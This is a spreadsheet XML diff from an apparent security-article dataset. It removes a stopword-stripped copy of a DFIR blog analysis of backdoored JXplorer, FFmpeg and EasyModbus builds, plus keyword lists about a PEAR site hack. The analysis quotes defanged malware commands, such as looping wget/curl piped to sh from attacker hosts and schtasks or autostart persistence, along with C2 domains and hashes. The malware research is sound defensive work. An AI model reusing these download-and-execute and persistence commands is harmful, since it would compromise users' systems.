'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'home', 'tech', 'mystery', 'hack', 'pear', 'website', 'day', 'official', 'website', 'version', 'pear', 'package', 'manager', 'month', 'team', 'detail', 'foggy', 'recent', 'breach', 'pear', 'website', 'crucial', 'lesserknown', 'part', 'ecosystem', 'way', 'scammed', 'online', 'phone', 'good', 'free', 'trial', 'habit', 'secure', 'remote', 'worker', 'spyware', 'phone', 'pear', 'extension', 'application', 'repository', 'first', 'package', 'manager', 'scripting', 'language', 'back', '1990', 'work', 'developer', 'reuse', 'code', 'common', 'function', 'library', 'developer', 'composer', 'new', 'thirdparty', 'package', 'manager', 'popular', 'widespread', 'default', 'official', 'binary', 'developer', 'version', 'ship', 'distribution', 'pear', 'gopearphar', 'version', 'pear', 'website', 'pearcompatible', 'library', 'last', 'week', 'pear', 'website', 'pearphpnet', 'homepage', 'short', 'message', 'breach', 'message', 'team', 'official', 'website', 'gopearphar', 'file', 'main', 'gopearphar', 'past', 'month', 'release', 'version', 'pearpearwebphar', 'file', 'hash', 'message', 'official', 'website', 'different', 'file', 'image', 'gopearphar', 'file', 'malicious', 'version', 'available', 'official', 'pear', 'website', 'antivirus', 'vendor', 'backdoor', 'backdoor', 'unknown', 'pear', 'team', 'file', 'source', 'code', 'thousand', 'line', 'code', 'server', 'administrator', 'update', 'pear', 'executable', 'gopearphar', 'pear', 'website', 'pear', 'team', 'website', 'hole', 'attacker', 'month', 'plant', 'gopearphar', 'file', 'first', 'place', 'pear', 'developer', 'detailed', 'incident', 'postmortem', 'operation', 'meantime', 'today', 'team', 'pear', 'pear', 'release', 'identical', 'previous', 'release', 'pear', 'team', 'signal', 'clean', 'version', 'webmaster', 'fear', 'release', 'power', 'percent', 'internet', 'site', 'small', 'portion', 'incident', 'people', 'composer', 'pear', 'executable', 'tweet', 'publication', 'article', 'team', 'detail', 'recent', 'breach', 'tweet', 'gopearphar', 'file', 'paranoids', 'fire', 'team', 'last', 'release', 'file', 'taint', 'taint', 'pear', 'taint', 'line', 'spawn', 'reverse', 'shell', 'perl', 'host', 'relation', 'pear', 'pear', 'installpearnozlibphar', 'gopearphar', 'file', 'good', 'md5sum', 'comparison', 'suspect', 'copy', 'pear', 'unsure', 'potential', 'insecurity', 'site', 'order', 'backup', 'previous', 'mirror', 'host', 'pear', 'single', 'info', 'page', 'concerned', 'gopearphar', 'file', 'past', 'month', 'server', 'restoral', 'ongoing', 'staff', 'timezone', 'difference', 'party', 'addition', 'team', 'malicious', 'backdoor', 'finding', 'pear', 'team', 'reverse', 'shell', 'host', 'attacker', 'server', 'pear', 'package', 'wordpress', 'here', 'tour', 'feature', 'coverage', 'implementation', 'flaw', 'available', 'window', 'zeroday', 'online', 'store', 'government', 'multinational', 'flaw', 'website', 'datum', 'extension', 'apis', 'researcher', 'malware', 'site', 'last', 'month', 'popular', 'wordpress', 'plugin', 'angry', 'former', 'employee', 'apple', 'host', 'free', 'coding', 'lesson', 'internet', 'site', 'unsupported', 'version', 'week', 'techrepublic', 'editorial', 'standard', 'comment', 'comment', 'community', 'guideline', 'server', 'hack', 'engine', 'review', 'solid', 'provider', 'wordpress', 'good', 'wordpress', 'hosting', 'service', 'harness', 'power', 'disruptive', 'innovation', 'work', 'home', 'topic', 'gallery', 'video', 'share', 'personal', 'information', 'meet', 'team', 'sitemap', 'reprint', 'policy', 'join', 'site', 'assistance', 'company', 'right', 'privacy', 'policy', 'cookie', 'setting', 'term']</t>
         </is>
       </c>
     </row>
@@ -2945,17 +2569,12 @@
       </c>
       <c r="C97" t="inlineStr">
         <is>
-          <t>dfir responding incidents candied bacon blog archives supreme backdoor factory recently playing virustotal intelligence testing dynamic behavior queries stumbled upon strange binary 7fce12d2cc785f7066f86314836c95ec file claimed installer jxplorer javabased “cross platform ldap browser editor” indicated official page strange mostly expect installer quite popular ldap browser create scheduled task order download execute powershell code subdomain hosted free dynamic provider initially planned keep writeup short focus dissecting suspicious jxplorer binary however analyzing jxplorer binary turned first step world backdoored software jxplorer order validate virustotal finding downloaded matching version windows installer official jxplorer sourceforge repository unsurprisingly hashes files different last thing wanted disassemble megabytes binaries started simpler checks order locate differences binaries packed unpacked tool compared md5s sections sections identical exception resource section sure content resource section could affect behavior installer used vbindiff exact difference tool actually revealed following modifications manifest file located resource section specifically requestedexecutionlevel property original file required administrator privileges requireadministrator modified fine running caller’s privilege level additional newline character appended file explaining byte size difference files relatively small bytes blob seemed zlib compressed data offset 0x4be095 note clear text file names zlib header http279tm platform1010tm first differences seem important focused last identified zlib data placed file overlay space figured likely part archive used installer store jxplorer files fortunately jxplorer page mentioned jxplorer using bitrock install builder short search managed find following unpacker bitrock archives bitrockunpacker installed activetcl downloaded required file used bitrockunpacker script unpack jxplorer installation files installers used winmerge tool compare resulting files directories surprise differences meant jxplorer application files left intact also meant needed going bitrockunpacker code noticed first mounted metakit database order extract installer files used locate extract cookfs archive storing jxplorer files using existing bitrockunpacker code created script dump installer files metakit database disk time comparing bitrock installer files yielded interesting results winmerge showed difference file named http279tm located libtcl884 directory despite size timestamps atime ctime mtime extracted cookfs archive file http279tm f6648f7e7a4e688f0792ed5a88a843d9 extracted modified installer remind standard httptcl module instead contained exactly looking summary actions performed http279tm script create scheduled task named notification push download execute powershell code hxxpsvfduckdnsorg write file 9d4aeb737179995a397d675f41e5f97f tempmicrosoftexplorersyncdb create scheduled task explorersync execute explorersyncdb write file 533ac97f44b4aea1a35481d963cc9106 tempbkjar execute following command line parameters hxxpcoppingfunmlblazebot userprofiledesktopsupbotjar execute additional file downloaded previous step ping legitimate domain supremenewyorkcom actions would drop malware user’s desktop would choose specific domain supremenewyorkcom thinking might dealing testing version modified installer names files blazebot supbot ring bells either decided online research blazebot google search results keyword blazebot youtube video created stein sørnson titled blaze supreme video presented process downloading running configuring seemed javabased sneaker called blazebot supreme blaze youtube video content description referenced source download blazebot github repository steisnblazebot wayback machine copy commit messages repository contained following author entries stein sørnson edfishman392mailru sample commit message suggesting stein sørnson owner youtube channel github repository unique name hard find another online account related stein sørnson time sourceforge allare778 wayback machine username allare778 full name present profile page title allare778 account owned three projects supremebot wayback machine copy referenced previously discussed youtube video hosted multiple files including supremebotjar 2098d71cd1504c8be229f1f8feaa878b exactly file also present blazebot github repository blazebot10211jar elitesubot wayback machine copy empty list past activity allesare wayback machine copy also contain files however listed project activity including names previously uploaded files also additional detail concerning blazebot started make sense much later back many reasons analyze sneaker took quick look decompiled java classes contained update functionality downloaded encrypted signed “update instructions” file project repository belonging user allare778 hxxpallesaresourceforgenetenusbver implementation update mechanism seemed allow project owner execute arbitrary system commands hosts running blazebot point thought connection modified jxplorer installer “supreme blaze bot” could coincidental took step back analyzed files extracted http279tm script hoping provide clues quick exercise files turned contain compact downloadersloaders bkjar file 533ac97f44b4aea1a35481d963cc9106 contained package implementing simple downloader responsible downloading data provided first command line argument saving file provided second command line argument second file explorersyncdb 9d4aeb737179995a397d675f41e5f97f interesting contained hardcoded urls package implemented infinite loop trying download invoke java code package following urls hxxpeccfreeddnsorgdatatxt hxxpsanstranglednetstat sanstranglednet resolution time analysis eccfreeddnsorg record pointed address hosting dynu’s redirect service eccfreeddnsorg redirect http requests jessicacheshireuserssourceforgenet fortunately datatxt file still present feimea portable expected datatxt 65579b8ed47ca163fae2b3dffd8b4d5a another file going decompiled code quite evident code implemented functionality typical means complete analysis code much ahead made following observations skimming code tool identified feimea portable mainline also returned following version strings audio system none audio codecs none seem implement audio related functionality supported following commands access append copy download fetch hash list logout noop remove rename select stat version seemed embedded modulus public exponent encrypt decrypt network communication hardcoded command control servers limonsduckdnsorg tcp13057 polarbearfreeddnsorg tcp7003 additionally reported rot13 encoded username operating system type architecture following hxxputelemetricsatwebpagescomupdatephptagrot13data also capability invoking java code obtained hardcoded hxxpeccfreeddnsorga2stxt available time analysis interestingly also implemented specific function extract user name value gitconfig file located user’s home directory point files analyze time suspected existence feimea portable likely much story someone playing jxplorer installer made assumption might stumbled upon testing version modified installer might versions floating around also expected distribution channel modified installer must exist jxplorer part deux hunt downloaded latest windows version jxplorer installer official website compared hash installer file hosted official github repository pegacatjxplorer c23a27b06281cfa93641fdbb611c33ff jxplorer installer files downloaded multiple software hosting websites results repeated process files grabbed sourceforge mirrors good searched jxplorer github number stars assigned repositories would probably ignored results come official jxplorer github repository pegacatjxplorer stars next serkovsjxplorer wayback machine copy twice many difference even striking subscribers repository also strange serkovsjxplorer even clone official jxplorer repository contained single file linux installer jxplorer downloaded linux installer binary repositories compared files looking sizes knew different original linux installer file jxplorer3312linuxinstallerrun 0c00fd22c65932ba9ce58b4ba6107cf0 bytes long downloaded serkovsjxplorer 0489493aeb26b6772bf3653aedf75d2a larger bytes files generated bitrock install builder tool used create windows version installer knew drill immediately used bitrockunpacker extract jxplorer software files compared differences next extracted bitrock installer files files identical decided inspect binary downloaded serkovsjxplorer repository skimming binary editor noticed strings characteristic packer however attempt unpack tool unsuccessful packed error realized file lacked usual magic values replaced following string l1ma fortunately able unpack file replaced occurrences l1ma original value unpacked file 25c47cf531e913cb4a59b2237ab85963 spent time reverseengineering eventually found suspicious function started decrypting bytes data located file offset 0x92040 using bytes long located file offset 0x66700 decrypted data contained nullterminated strings ultimate goal code establish persistence execute following command binsh truedo wget hxxpyzyaioonlinewebshopnetactstatphpinfoslade shsleep 60donedevnull code followed main paths depending privileges executed root privileges code would perform following actions create systemd service rpcstatdsync following description sync peers restart execute oneliner establish additional persistence every user system creating desktop entry configautostartdesktop execute oneliner without root privileges code resorted infecting current user modified software rather specific stage proof entity behind modification linux windows jxplorer installers also curious else find github power social graph started going github accounts starred subscribed repository serkovsjxplorer quickly noticed patterns accounts seemed created multiple batches specific dates process automated accounts created content simply used star repositories accounts created earlier dates february used host single repository increase authenticity repositories starring subscribing additional similarities among accounts hosted repositories account hosted single repository history commits author field commit messages indicated consistent usage free slovakian email service poboxsk username often corresponding used github sample commit message timestamps present commit messages consistently indicated time zone commit messages tended consistent among different accounts repositories erroneous message “2st commit” appeared different repositories belonging different accounts aurelrybareditbox wayback machine copy henrichjahodaardublock wayback machine copy commits seemed automated occurred specific times among different accounts repositories gabrieolobounceball karibankereug jeanelletoblergumbo repositories hosted single file usually game gabrieolobounceball wayback machine copy tool jelamaruckapdfjumbler wayback machine copy library vaclaw281junit wayback machine copy eventually ended using github neo4j collect analyze metadata associated suspicious accounts repositories data showed nothing confined network github accounts starring subscribing others’ repositories limited time resources able analyze file identified repository resorted analyzing small subset files repositories turned contain interesting artifacts allowed draw additional connections fill existing gaps graph shows “social interactions” serkovs account accounts analyzed mansiiqkal ballory number related starredsubscribed repositories missing link decided inspect content balloryffmpeg wayback machine copy repository contain files like identified repositories instead bunch linux binaries claiming contain “ffmpeg linux build bit” additionally repository stood many stars subscribers others however owner ballory starred subscribed least repositories according collected data readmetxt file present repository directly linked wwwjohnvansicklecomffmpeg website hosting static ffmpeg builds linux fact file names directory structure matched sample build downloaded find exact build ffmpeggit2018042764bitstatictarxz listed readmetxt file wwwjohnvansicklecom able compare files started analyzing ffmpeg binary c78ccfc45bfba703cce0fc0c75c0f6af immediately noticed suspicious code right entry point code responsible mapping binary procselfexe jumping specific offset bytes file dumping disassembling shellcode occupying last bytes binary left short decryption loop 0x37 0x2e encrypted data decrypted data contained shellcode responsible forking executing following command child process execve syscall binsh homewhoamiconfigmkdir autostartcd autostartecho desktop entryyecho typeapplicationyecho execbinsh truedo wget hxxpallesaresourceforgenetenusm shsleep 60doneychmod desktop exactly looking allesare sourceforge project owned account named allare778 stein sørnson finding created plausible link github user ballory account remaining part code supposed parent process responsible decrypting 0x11 0x31 bytes data located bytes file jumping decrypted data seemed contain original entry point function analyzed binaries repository ffmpeg10bit 6d5bea9bfe014fc737977e006692ebf3 ffprobe 98f8600ff072625fd8ff6b3e14675648 qtfaststart e9b58b1e173734b836ed4b74184c320b contained pieces shellcode located offsets files used decryption routines small differences hardcoded offsets even missing link second repository yielded interesting results mansiiqkaleasymodbustcpudpjava wayback machine copy repository starred subscribed serkovs ballory accounts description easy modbus tcpudprtu file name easymodbusjavajar suggested contained easymodbus java library downloaded recent version released easymodbusjavajar 56668c3915a0aa621d7f07aa11f7c8a9 official easymodbus project page compared easymodbusjavajar 4d18388a9b351907be4a9f91785c9997 mansiiqkaleasymodbustcpudpjava doubt files different used zipinfo list archives’ files metadata mansiiqkaleasymodbustcpudpjava larger bytes included additional file inumberofconnectedclientschangeddelegator1class according timestamps repackaged turn correlated timestamp present commit message sure differences used jdgui save decompiled java classes jars used winmerge differences skipping negligible code formatting artifacts generated decompiler found extra file dereeasymodbusserverinumberofconnectedclientschangeddelegator1class contained three large byte arrays seemed decryption function classes explicitly imported inumberofconnectedclientschangeddelegator1 class code present inumberofconnectedclientschangeddelegator1 class designed drop files disk establish persistence code used custom decryption routine decrypt array bytes used resulting blob bytes total cf2ca657816af534c07c8ceca167e25b source file content strings file names system commands depending operating system type code executed performed different actions described linux code dropped file 9d4aeb737179995a397d675f41e5f97f homelocalsharebbauto created desktop entry persistence setting homeconfigautostartnonedesktop file execute following command binsh java homelocalsharebbauto code also created additional desktop entry homeconfigautostartdesktop execute following command binsh truedo wget hxxpelnduckdnsorgse shsleep 60done macos code dropped file 9d4aeb737179995a397d675f41e5f97f homelibrarylaunchagentsautoupdaterdat established persistence creating launch agent called autoupdater homelibrarylaunchagentsautoupdaterplist code also created additional launch agent called softwaresync execute following command binsh truedo curl hxxpelnduckdnsorgse shsleep 60done windows code dropped file 9d4aeb737179995a397d675f41e5f97f tempmicrosoftexplorersyncdb established persistence executing following command schtasks create explorersync javaw tempmicrosoftexplorersyncdb minute dropped file 9d4aeb737179995a397d675f41e5f97f windows file scheduled task names explorersyncdb explorersync exactly discovered modified jxplorer installer script created another plausible connection mansiiqkaleasymodbustcpudpjava repository modified windows installer jxplorer also analyzed previous version easymodbusjavajar 38f51f6555eba1f559b04e1311deee35 file committed mansiiqkaleasymodbustcpudpjava repository contained additional java class however code different changes encrypted array offsets referencing decrypted data decrypted blob bytes long 9a3936c820c88a16e22aaeb11b5ea0e7 contained mostly data later version notable difference usage appdata instead temp base directory location dropped file windows systems summary following breadcrumbs able discover draw connections pieces malware online infrastructure modified jxplorer windows installer found virustotal modified easymodbus java library found github mansiiqkaleasymodbustcpudpjava dropped file downloader 9d4aeb737179995a397d675f41e5f97f similarities visible dropped file path tempmicrosoftexplorersyncdb scheduled task name explorersync github account mansiiqkal part “social circle” github accounts ballory serkovs among others accounts linked starring subscribing confined github repositories including other’s repositories github account ballory created balloryffmpeg repository containing modified version ffmpeg tools malicious code present tools download file following sourceforge project hxxpallesaresourceforgenet project owned account named allare778 stein sørnson account owned another project named supremebot hosting sneaker name described “supreme york bot” supremebotjar file 2098d71cd1504c8be229f1f8feaa878b hosted sourceforge supremebot project also present steisnblazebot github repository belonging account steisn stein sørnson additionally youtube account stein sørnson hosted video “blaze supreme nyc” coincidentally malicious code present modified jxplorer windows installer referenced “blazebot” supremenewyorkcom github account serkovs created serkovsjxplorer repository containing modified jxplorer linux installer file malicious code present binary reference previously observed infrastructure modified jxplorer installers windows linux could connected following linked github accounts point let’s find following specific indicators found analyzed files collected metadata github repositories able discover additional related pieces malicious code started virustotal hunting capabilities search returned binaries belonging malware family eimea lite functionality supported commands malware seems closely tied previously discussed feimea portable main difference feimea portable written java eimea lite comes form compiled binaries windows linux operating systems observed instance eimea lite built lame encoder tool likely order thwart detection oldest samples uploaded virustotal unsurprisingly named supremebot2cpl 815db0de2c6a610797c6735511eaaaf9 sample uses command control servers sanemarineduckdnsorg lemonadefreeddnsorg contains self signed certificates issued allesare supports similar commands java based feimea portable capability eiaprev133 eauth select examine status list stat search esearch rename hash fetch copy append link symlink remove access noop logout recent sample aerocpl dd3a38ee6b5b6340acd3bb8099f928a8 uploaded virustotal correlates version string present file eimea lite mainline audio system framework audio codecs lamemp3 opencoreamrnb soxr build win32 instance uses command control servers observed initially analyzed sample feimea portable 65579b8ed47ca163fae2b3dffd8b4d5a limonsduckdnsorg polarbearfreeddnsorg search focused exploration github graph previously mentioned suspicious github accounts repositories created confined network however graph also included entries seemed entries account andrew dunkins adunkins wayback machine copy included nine repositories hosting linux cross compilation tools repository watched starred several already known suspicious accounts account seemed legitimate first sight included profile picture description consistent previously discovered accounts however look sample binary i686w64mingw32addr2line b54156221d1c5387b8de0eb4605dc3a0 hosted repositories quickly proved wrong binary shellcode almost identical found ffmpeg binaries obtained balloryffmpeg repository difference shellcode execute following command binsh homewhoamiconfigmkdir autostartcd autostarty echo desktop entryy echo typeapplicationy echo execbinsh truedo wget hxxpallesaresourceforgenettestmsg shsleep 60donechmod desktop overall backdoored binaries nine github repositories belonging andrew dunkins following trail found additional account snacknroll11 starred andrew dunkins’ repositories contained repository interesting name description streettalkprivbot supreme wayback machine copy despite name description binary file included repository supremebotexe turned something else something seen previously something provided great closure post file supremebotexe 6ee28018e7d31aef0b4fd6940dff1d0a actually another modified version jxplorer installer windows installer also contained changed http279tm file 3a75c6b9b8452587b9e809aaaf2ee8c4 however actions performed script slightly different initially analyzed version used bitsadmin powershell download execute batch script hxxpenlduckdnsorg dropped file d7c4a1d4f75045a2a1e324ae5114ea17 brjar file another version previously described downloader don’t think appendix please note github removed identified accounts repositories copies repositories showing content available wayback machine possible included links wayback machine copies post list github accounts list github repositories list indicators posted backdoor malware reverse engineering rabbit hole packaged powershell scripts comments please enable javascript view comments powered disqus recent posts supreme backdoor factory rabbit hole packaged powershell scripts tekdefense network challenge walkthrough webshells rise defenders part webshells every time story…part github repos status updating… dfirit github tweets tweets dfirit copyright dfirit powered octopress theme gehaxelt solutions neef</t>
+          <t xml:space="preserve">A malicious version of the jxplorer Linux installer was uploaded to a github repo that was promoted to appear legitimate. </t>
         </is>
       </c>
       <c r="D97" t="inlineStr">
         <is>
           <t>https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/</t>
-        </is>
-      </c>
-      <c r="E97" t="inlineStr">
-        <is>
-          <t>['incident', 'bacon', 'blog', 'archive', 'factory', 'virustotal', 'intelligence', 'dynamic', 'behavior', 'query', 'strange', 'binary', 'file', 'installer', 'cross', 'editor', 'official', 'page', 'strange', 'popular', 'ldap', 'task', 'order', 'download', 'powershell', 'code', 'subdomain', 'free', 'dynamic', 'provider', 'short', 'focus', 'suspicious', 'first', 'step', 'world', 'software', 'order', 'virustotal', 'finding', 'version', 'window', 'official', 'hash', 'file', 'different', 'last', 'thing', 'disassemble', 'megabyte', 'binary', 'simple', 'check', 'order', 'difference', 'binary', 'unpacked', 'tool', 'section', 'identical', 'exception', 'resource', 'section', 'sure', 'content', 'resource', 'section', 'behavior', 'installer', 'exact', 'difference', 'tool', 'modification', 'file', 'resource', 'section', 'property', 'original', 'file', 'administrator', 'privilege', 'requireadministrator', 'fine', 'caller', 'privilege', 'level', 'additional', 'newline', 'character', 'file', 'byte', 'size', 'difference', 'file', 'small', 'byte', 'datum', 'clear', 'text', 'file', 'name', 'first', 'difference', 'important', 'last', 'file', 'overlay', 'space', 'likely', 'part', 'archive', 'installer', 'store', 'jxplorer', 'file', 'builder', 'short', 'search', 'unpacker', 'bitrock', 'archive', 'activetcl', 'file', 'bitrockunpacker', 'script', 'installation', 'file', 'winmerge', 'tool', 'file', 'directory', 'difference', 'application', 'file', 'intact', 'code', 'first', 'database', 'order', 'installer', 'file', 'locate', 'extract', 'archive', 'storing', 'jxplorer', 'file', 'bitrockunpacker', 'code', 'script', 'installer', 'file', 'database', 'disk', 'time', 'bitrock', 'file', 'interesting', 'result', 'winmerge', 'difference', 'file', 'directory', 'size', 'timestamp', 'atime', 'ctime', 'mtime', 'cookfs', 'archive', 'file', 'f6648f7e7a4e688f0792ed5a88a843d9', 'installer', 'standard', 'httptcl', 'module', 'summary', 'action', 'script', 'task', 'notification', 'push', 'download', 'powershell', 'write', 'file', 'tempmicrosoftexplorersyncdb', 'task', 'file', 'execute', 'command', 'line', 'parameter', 'additional', 'file', 'previous', 'step', 'ping', 'legitimate', 'domain', 'action', 'desktop', 'specific', 'domain', 'thinking', 'testing', 'version', 'installer', 'name', 'file', 'bell', 'online', 'research', 'result', 'blaze', 'process', 'javabased', 'sneaker', 'video', 'content', 'description', 'source', 'copy', 'message', 'repository', 'author', 'commit', 'message', 'unique', 'name', 'online', 'account', 'wayback', 'machine', 'username', 'full', 'name', 'present', 'profile', 'page', 'title', 'account', 'project', 'machine', 'copy', 'video', 'multiple', 'file', 'file', 'present', 'elitesubot', 'wayback', 'machine', 'empty', 'list', 'activity', 'copy', 'file', 'project', 'activity', 'name', 'file', 'additional', 'detail', 'blazebot', 'sense', 'many', 'reason', 'sneaker', 'quick', 'look', 'class', 'update', 'functionality', 'instruction', 'file', 'project', 'repository', 'user', 'implementation', 'update', 'mechanism', 'project', 'owner', 'arbitrary', 'system', 'command', 'host', 'connection', 'coincidental', 'step', 'file', 'script', 'clue', 'quick', 'exercise', 'file', 'compact', 'downloadersloader', 'bkjar', 'file', 'package', 'simple', 'downloader', 'responsible', 'datum', 'first', 'command', 'line', 'argument', 'file', 'second', 'command', 'line', 'argument', 'second', 'file', 'url', 'package', 'infinite', 'loop', 'download', 'package', 'url', 'time', 'analysis', 'eccfreeddnsorg', 'record', 'address', 'service', 'eccfreeddnsorg', 'redirect', 'http', 'request', 'datatxt', 'file', 'feimea', 'portable', 'datatxt', 'file', 'code', 'evident', 'code', 'functionality', 'typical', 'complete', 'analysis', 'code', 'observation', 'code', 'tool', 'portable', 'mainline', 'version', 'string', 'audio', 'system', 'none', 'audio', 'codec', 'none', 'audio', 'functionality', 'command', 'append', 'copy', 'download', 'hash', 'list', 'logout', 'noop', 'rename', 'select', 'stat', 'version', 'modulus', 'public', 'exponent', 'network', 'communication', 'command', 'control', 'server', 'polarbearfreeddnsorg', 'tcp7003', 'rot13', 'username', 'operating', 'system', 'type', 'architecture', 'capability', 'hxxpeccfreeddnsorga2stxt', 'available', 'time', 'analysis', 'specific', 'function', 'user', 'name', 'value', 'gitconfig', 'file', 'user', 'home', 'directory', 'point', 'file', 'time', 'existence', 'portable', 'much', 'story', 'assumption', 'testing', 'version', 'installer', 'version', 'distribution', 'channel', 'installer', 'late', 'window', 'version', 'official', 'website', 'hash', 'installer', 'file', 'official', 'file', 'multiple', 'software', 'hosting', 'website', 'process', 'file', 'sourceforge', 'mirror', 'star', 'repository', 'result', 'official', 'pegacatjxplorer', 'machine', 'many', 'difference', 'subscriber', 'repository', 'strange', 'serkovsjxplorer', 'clone', 'official', 'single', 'file', 'binary', 'repository', 'file', 'size', 'different', 'original', 'installer', 'byte', 'serkovsjxplorer', 'large', 'byte', 'file', 'bitrock', 'builder', 'tool', 'window', 'version', 'installer', 'drill', 'software', 'file', 'difference', 'bitrock', 'file', 'file', 'identical', 'inspect', 'serkovsjxplorer', 'repository', 'binary', 'editor', 'string', 'characteristic', 'packer', 'unpack', 'tool', 'unsuccessful', 'error', 'file', 'usual', 'magic', 'value', 'string', 'l1ma', 'able', 'unpack', 'file', 'occurrence', 'l1ma', 'original', 'value', 'unpacked', 'file', 'time', 'suspicious', 'function', 'decrypting', 'byte', 'datum', 'file', '0x92040', 'byte', 'file', 'datum', 'string', 'ultimate', 'goal', 'code', 'persistence', 'execute', 'command', 'binsh', 'truedo', 'wget', 'hxxpyzyaioonlinewebshopnetactstatphpinfoslade', 'shsleep', 'code', 'main', 'path', 'privilege', 'root', 'privilege', 'code', 'action', 'systemd', 'service', 'rpcstatdsync', 'description', 'sync', 'peer', 'oneliner', 'additional', 'persistence', 'user', 'system', 'desktop', 'entry', 'configautostartdesktop', 'oneliner', 'root', 'privilege', 'code', 'current', 'user', 'software', 'specific', 'stage', 'proof', 'entity', 'curious', 'social', 'graph', 'account', 'subscribed', 'repository', 'serkovsjxplorer', 'pattern', 'account', 'multiple', 'batch', 'specific', 'date', 'account', 'content', 'star', 'repository', 'account', 'early', 'date', 'host', 'single', 'repository', 'authenticity', 'repository', 'additional', 'similarity', 'account', 'repository', 'account', 'single', 'repository', 'history', 'author', 'field', 'message', 'consistent', 'usage', 'free', 'slovakian', 'email', 'service', 'username', 'sample', 'commit', 'message', 'timestamp', 'present', 'message', 'time', 'zone', 'message', 'consistent', 'different', 'account', 'repository', 'erroneous', 'message', '2st', 'commit', 'different', 'repository', 'different', 'account', 'aurelrybareditbox', 'wayback', 'machine', 'wayback', 'machine', 'copy', 'commit', 'specific', 'time', 'different', 'account', 'repository', 'gabrieolobounceball', 'repository', 'single', 'file', 'game', 'gabrieolobounceball', 'wayback', 'machine', 'copy', 'tool', 'copy', 'wayback', 'machine', 'copy', 'analyze', 'suspicious', 'account', 'repository', 'datum', 'network', 'account', 'other', 'repository', 'time', 'resource', 'able', 'file', 'repository', 'small', 'subset', 'file', 'repository', 'interesting', 'artifact', 'additional', 'connection', 'gap', 'graph', 'social', 'interaction', 'serkovs', 'account', 'account', 'mansiiqkal', 'ballory', 'number', 'starredsubscribed', 'repository', 'link', 'content', 'copy', 'repository', 'file', 'repository', 'bunch', 'linux', 'binary', 'ffmpeg', 'bit', 'repository', 'many', 'star', 'other', 'owner', 'least', 'repository', 'collected', 'datum', 'readmetxt', 'file', 'present', 'repository', 'website', 'static', 'ffmpeg', 'fact', 'file', 'name', 'directory', 'structure', 'sample', 'build', 'exact', 'build', 'ffmpeggit2018042764bitstatictarxz', 'readmetxt', 'file', 'able', 'file', 'ffmpeg', 'binary', 'suspicious', 'code', 'right', 'entry', 'point', 'code', 'responsible', 'binary', 'specific', 'offset', 'byte', 'file', 'shellcode', 'last', 'byte', 'binary', 'short', 'decryption', 'loop', '0x2e', 'datum', 'shellcode', 'responsible', 'forking', 'executing', 'command', 'child', 'process', 'execve', 'binsh', 'desktop', 'truedo', 'wget', 'hxxpallesaresourceforgenetenusm', 'desktop', 'sourceforge', 'project', 'account', 'plausible', 'link', 'account', 'parent', 'process', 'responsible', 'decrypting', 'byte', 'datum', 'byte', 'file', 'datum', 'original', 'entry', 'point', 'function', 'binary', 'repository', 'qtfaststart', 'piece', 'offset', 'file', 'decryption', 'routine', 'small', 'difference', 'offset', 'link', 'second', 'repository', 'interesting', 'result', 'copy', 'repository', 'subscribed', 'serkovs', 'ballory', 'account', 'description', 'easy', 'tcpudprtu', 'file', 'name', 'easymodbusjavajar', 'recent', 'version', 'official', 'project', 'page', 'doubt', 'file', 'different', 'zipinfo', 'list', 'archive', 'file', 'large', 'byte', 'additional', 'file', 'timestamp', 'turn', 'correlated', 'timestamp', 'present', 'commit', 'message', 'sure', 'difference', 'jdgui', 'save', 'class', 'jar', 'winmerge', 'difference', 'negligible', 'code', 'formatting', 'artifact', 'decompiler', 'extra', 'file', 'dereeasymodbusserverinumberofconnectedclientschangeddelegator1class', 'large', 'byte', 'array', 'decryption', 'function', 'class', 'inumberofconnectedclientschangeddelegator1', 'class', 'code', 'present', 'inumberofconnectedclientschangeddelegator1', 'class', 'drop', 'file', 'disk', 'establish', 'persistence', 'custom', 'decryption', 'routine', 'array', 'byte', 'blob', 'byte', 'cf2ca657816af534c07c8ceca167e25b', 'source', 'file', 'content', 'string', 'file', 'name', 'system', 'command', 'operating', 'system', 'type', 'code', 'different', 'action', 'file', 'desktop', 'entry', 'persistence', 'homeconfigautostartnonedesktop', 'file', 'execute', 'command', 'additional', 'desktop', 'entry', 'homeconfigautostartdesktop', 'execute', 'command', 'binsh', 'truedo', 'wget', 'hxxpelnduckdnsorgse', 'file', 'homelibrarylaunchagentsautoupdaterdat', 'persistence', 'launch', 'agent', 'code', 'additional', 'launch', 'agent', 'command', 'file', 'persistence', 'executing', 'command', 'schtask', 'minute', 'file', 'window', 'file', 'task', 'script', 'plausible', 'connection', 'repository', 'window', 'installer', 'previous', 'version', 'file', 'repository', 'additional', 'different', 'change', 'array', 'offset', 'datum', 'blob', 'byte', 'datum', 'version', 'notable', 'difference', 'usage', 'temp', 'base', 'directory', 'location', 'file', 'window', 'system', 'summary', 'breadcrumb', 'able', 'draw', 'connection', 'piece', 'online', 'infrastructure', 'file', 'downloader', 'similarity', 'visible', 'file', 'task', 'name', 'part', 'social', 'circle', 'ballory', 'serkovs', 'other', 'account', 'repository', 'other', 'repository', 'balloryffmpeg', 'repository', 'version', 'ffmpeg', 'malicious', 'code', 'present', 'tool', 'file', 'sourceforge', 'project', 'hxxpallesaresourceforgenet', 'project', 'account', 'project', 'supremebot', 'sneaker', 'name', 'file', 'sourceforge', 'supremebot', 'project', 'account', 'video', 'malicious', 'code', 'present', 'serkovsjxplorer', 'repository', 'file', 'malicious', 'code', 'present', 'binary', 'reference', 'infrastructure', 'jxplorer', 'account', 'point', 'specific', 'indicator', 'file', 